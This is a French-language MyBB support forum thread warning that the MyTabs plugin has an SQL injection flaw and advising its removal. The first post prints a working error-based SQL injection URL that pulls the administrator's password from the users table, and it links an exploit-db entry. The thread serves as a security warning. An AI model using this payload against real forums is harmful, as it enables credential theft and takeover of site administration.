1. IMPORTANT : Nouvelles mesures de sécurité - 2. Règles pour obtenir de l'aide dans les forums de support - 3. Restrictions des droits pour le groupe "Support suspendu"

Il est obligatoire de respecter les Règles de MyBB.fr : Version abrégée ou Version complète pour obtenir du support sur nos forums.

Les membres ayant un site/forum contrevenant aux règles de MyBB.support seront placés dans le groupe "Support suspendu" et ne bénéficieront plus du support du staff. Nous recommandons aux autres membres d'agir de même. Il ne s'agit pas d'un bannissement, le membre retrouvera son statut "normal" dès que sa situation sera conforme aux règles.

Nouveau : un Wiki en français : plus de détails.
Avant de soumettre votre problème, consultez-le, ainsi que la FAQ, sans oublier le moteur de recherche interne.


Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
MyTabs SQL Vulnerabilty
Tags » mytabs, sql, vulnerabilty
10-08-2011, 20:41, (This post was last modified: 10-08-2011, 20:52 by dipsiii.)
#1
MyTabs SQL Vulnerabilty
Attention,


Le plugin mytabs possède une erreur SQL et on peut avoir accès à l’administration.

La seul solution est de supprimer le plugin.

Code:
http://localhost/forum/index.php?tab=1' and(select 1 from(select count(*),concat((select [b]password[/b] from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

http://www.exploit-db.com/exploits/17595/
Reply
11-08-2011, 0:04, (This post was last modified: 11-08-2011, 0:05 by valix.)
#2
RE: MyTabs SQL Vulnerabilty
Ouai j'avais dit a exdiogene et sa spyto , mais vu qu'il mon pas répondu ^^
Reply




Users browsing this thread: 1 Guest(s)

Contact Us | MyBB.support | Return to Top | Return to Content | Lite (Archive) Mode | RSS Syndication
 Translation utility provided by Regentronique